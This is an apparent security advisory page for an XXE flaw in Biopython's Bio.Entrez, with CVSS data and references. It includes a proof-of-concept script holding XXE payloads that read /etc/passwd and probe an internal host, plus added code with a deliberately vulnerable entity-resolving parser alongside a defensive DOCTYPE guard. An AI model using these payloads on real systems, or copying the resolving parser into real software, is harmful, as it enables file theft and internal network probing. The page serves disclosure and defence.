Security Vulnerability Report
CVE-2025-68463 CVSS 4.9 MEDIUM


Published: 2025-12-18 06:15:50
Last Modified: 2026-05-08 19:16:28

Description

Bio.Entrez in Biopython through 1.86 allows doctype XXE (CWE-611): the XML parser honours external references carried in a DOCTYPE supplied with the document, so a crafted response can make it read local files or contact other hosts.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:L

Configurations (Affected Products)

No CPE configuration data is available from NVD. Affected versions according to the references:

Biopython 1.86 (affected)
Biopython 1.85 and earlier (affected)
Biopython 1.87 and later (fixed; see the pypi.org reference)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
'''
CVE-2025-68463 PoC - Biopython Bio.Entrez XXE Vulnerability

Shows the payload shapes used against the doctype XXE in Bio.Entrez (local
file read and SSRF).  The script only prints them and feeds the file-read
payload to the standard library's ElementTree to show what a parser that does
NOT resolve external entities does with it; it never calls Bio.Entrez itself.
Run it against an affected Biopython (<= 1.86) only with authorization.
'''
import xml.etree.ElementTree as ET

# Malicious XML payload with XXE to read a local file
XXE_PAYLOAD = '''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
<data>&xxe;</data>
</root>
'''


def exploit_xxe():
    """
    Walk through the two attack scenarios with their payloads.
    """
    print("[*] CVE-2025-68463 XXE PoC - Biopython Bio.Entrez")
    print("[*] Target: Biopython <= 1.86 (Bio.Entrez module)")

    # Attack scenario 1: local file read
    print("\n[+] Attack Scenario 1: Reading local file via XXE")
    print("[*] Payload: file:///etc/passwd")

    # xml.etree.ElementTree does not expand external entities: it raises
    # ParseError ("undefined entity") on &xxe;, so the except branch runs.
    # A parser that resolves the SYSTEM identifier (the vulnerable behaviour)
    # would instead place the file contents inside <data>.  In a real attack
    # the malicious XML arrives in place of an NCBI query response.
    try:
        root = ET.fromstring(XXE_PAYLOAD)
        data = root.find('data')
        if data is not None:
            print("[!] Parser accepted the external entity reference")
            print(f"[!] <data> content: {data.text!r}")
    except ET.ParseError as e:
        print(f"[*] ElementTree refused the payload: {e}")

    # Attack scenario 2: SSRF via XXE
    print("\n[+] Attack Scenario 2: Server-Side Request Forgery (SSRF)")
    ssrf_payload = '''<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://internal-server:8080/admin">]>
<foo>&xxe;</foo>
'''
    print("[*] Payload: http://internal-server:8080/admin")
    print(ssrf_payload)
    print("[!] A resolving parser lets the attacker probe internal network resources")
    return True


def vulnerable_code_example():
    """
    Illustrative vulnerable pattern (not a quote of Biopython's parser):
    XML fetched from the network is handed to a parser that resolves
    external entities.
    """
    print("\n[+] Vulnerable Code Pattern (illustrative):")
    print("""
# In Bio/Entrez/__init__.py or similar:
from Bio._py3k import StringIO
import xml.etree.ElementTree as ET

def parse_xml_response(xml_string):
    # VULNERABLE only if the parser resolves external entities
    # (the stdlib ElementTree does not; an expat setup with an
    # ExternalEntityRefHandler that fetches SYSTEM ids does)
    return ET.fromstring(xml_string)

# Or using urllib without validation:
handle = Entrez.efetch(db="nuccore", id="12345")
# XML from NCBI could be compromised
""")


if __name__ == "__main__":
    exploit_xxe()
    vulnerable_code_example()
    print("\n[*] Fix: upgrade to Biopython 1.87 or later, or reject DOCTYPE "
          "internal subsets and external entities before parsing")
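The PoC above only prints its payloads, so it shows neither the mechanism nor a fix. The following is an added example, not code from Biopython or from this page's PoC, that does both on the standard library's xml.parsers.expat: parse_unsafely resolves whatever SYSTEM identifier a document names (the CWE-611 pattern) and leaks a file we control into the parsed text, while guard_doctype and parse_safely reject the two DOCTYPE shapes the attack needs before any resolution happens. It does not use or reproduce Bio.Entrez's own parser; the allowlisted host, the file:// resolver, the eSearch-style document, the SSRF DOCTYPE and the secret file are all constructed for the example.

```python
"""Added example (not Biopython's code): a DOCTYPE-driven XXE on xml.parsers.expat
beside a guard that blocks it.  Allowlist, resolver and sample XML are illustrative."""
import os
import tempfile
import xml.parsers.expat as expat
from pathlib import Path
from urllib.parse import urlparse
from urllib.request import url2pathname

ALLOWED_DTD_HOSTS = frozenset({"eutils.ncbi.nlm.nih.gov"})  # assumed legitimate DTD host
SECRET = "constructed-secret-token=4f3c\n"  # constructed stand-in for /etc/passwd


def parse_unsafely(xml_bytes):
    """Vulnerable pattern: fetch and parse every external reference.  With ALWAYS
    param-entity parsing the DOCTYPE's own SYSTEM id reaches the same handler
    (context=None): the 'doctype' route named in the description."""
    chunks = []
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)

    def external_entity_ref(context, base, system_id, public_id):
        # Hypothetical resolver: reads whatever file:// URL the document names.
        # One that also fetched http(s) would turn the same bug into SSRF.
        with open(url2pathname(urlparse(system_id).path), "rb") as fh:
            sub = parser.ExternalEntityParserCreate(context)  # inherits handlers
            sub.Parse(fh.read(), True)
        return 1  # non-zero: handled, keep parsing

    parser.ExternalEntityRefHandler = external_entity_ref
    parser.CharacterDataHandler = chunks.append
    parser.Parse(xml_bytes, True)
    return "".join(chunks)


def guard_doctype(xml_bytes, allowed_hosts=ALLOWED_DTD_HOSTS):
    """Reject an internal subset (where <!ENTITY ... SYSTEM> lives) and any SYSTEM
    id that is not https on an allowlisted host.  Resolves nothing: no
    ExternalEntityRefHandler is set and param-entity parsing stays at NEVER."""
    seen = []
    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = lambda name, sysid, pubid, internal: seen.append(
        (name, sysid, pubid, bool(internal)))
    parser.Parse(xml_bytes, True)
    if not seen:
        return None
    name, system_id, _public_id, has_internal_subset = seen[0]
    if has_internal_subset:
        raise ValueError("DOCTYPE %s carries an internal subset" % name)
    if system_id is not None:
        url = urlparse(system_id)
        if url.scheme != "https" or url.hostname not in allowed_hosts:
            raise ValueError("DOCTYPE system id not allowlisted: %s" % system_id)
    return seen[0]


def parse_safely(xml_bytes, allowed_hosts=ALLOWED_DTD_HOSTS):
    """Guard first, then parse refusing every external reference (0 aborts)."""
    guard_doctype(xml_bytes, allowed_hosts)
    chunks = []
    parser = expat.ParserCreate()
    parser.ExternalEntityRefHandler = lambda context, base, sysid, pubid: 0
    parser.CharacterDataHandler = chunks.append
    parser.Parse(xml_bytes, True)
    return "".join(chunks)


def is_blocked(xml_bytes):
    """True when the hardened path refuses the document."""
    try:
        parse_safely(xml_bytes)
    except ValueError:
        return True
    return False


# Constructed documents: one modelled on a benign Entrez eSearch response, one
# carrying the page's scenario-2 (SSRF) target in the DOCTYPE itself.
BENIGN_ENTREZ = (b'<?xml version="1.0" encoding="UTF-8"?>\n'
                 b'<!DOCTYPE eSearchResult PUBLIC "-//NLM//DTD esearch 20060628//EN" '
                 b'"https://eutils.ncbi.nlm.nih.gov/eutils/dtd/20060628/esearch.dtd">\n'
                 b'<eSearchResult><Count>2</Count><IdList><Id>11</Id><Id>22</Id>'
                 b'</IdList></eSearchResult>\n')
SSRF_DOCTYPE = (b'<?xml version="1.0"?>\n'
                b'<!DOCTYPE foo SYSTEM "http://internal-server:8080/admin">\n<foo>probe</foo>\n')


def demo():
    """Page's scenario-1 payload aimed at a file we control, through both paths."""
    with tempfile.TemporaryDirectory() as tmp:
        target = os.path.join(tmp, "secret.txt")
        with open(target, "w") as fh:
            fh.write(SECRET)
        payload = ('<?xml version="1.0" encoding="UTF-8"?>\n'
                   '<!DOCTYPE root [ <!ENTITY xxe SYSTEM "%s"> ]>\n'
                   '<root><data>&xxe;</data></root>\n' % Path(target).as_uri()).encode()
        return {"leaked": parse_unsafely(payload).strip(), "blocked": is_blocked(payload)}
```

demo() returns the secret file's text under "leaked" from the resolving parser and True under "blocked" from the guarded one. On an affected install the same guard would run over the bytes read from an Entrez handle before calling Bio.Entrez.read or Bio.Entrez.parse: the eSearch-style document passes because its DOCTYPE names an https URL on the allowlisted host and has no internal subset, while both the file-read payload and the SSRF DOCTYPE are refused before anything is fetched.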

References

https://github.com/biopython/biopython/blob/master/NEWS.rst
https://github.com/biopython/biopython/commit/736c96f37b190732ecca9da80ad0cb9d4967214d
https://github.com/biopython/biopython/issues/5109
https://pypi.org/project/biopython/1.87/
http://www.openwall.com/lists/oss-security/2026/05/08/16

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68463", "sourceIdentifier": "[email protected]", "published": "2025-12-18T06:15:50.177", "lastModified": "2026-05-08T19:16:27.697", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Bio.Entrez in Biopython through 186 allows doctype XXE."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:L", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-611"}]}], "references": [{"url": "https://github.com/biopython/biopython/blob/master/NEWS.rst", "source": "[email protected]"}, {"url": "https://github.com/biopython/biopython/commit/736c96f37b190732ecca9da80ad0cb9d4967214d", "source": "[email protected]"}, {"url": "https://github.com/biopython/biopython/issues/5109", "source": "[email protected]"}, {"url": "https://pypi.org/project/biopython/1.87/", "source": "[email protected]"}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/08/16", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}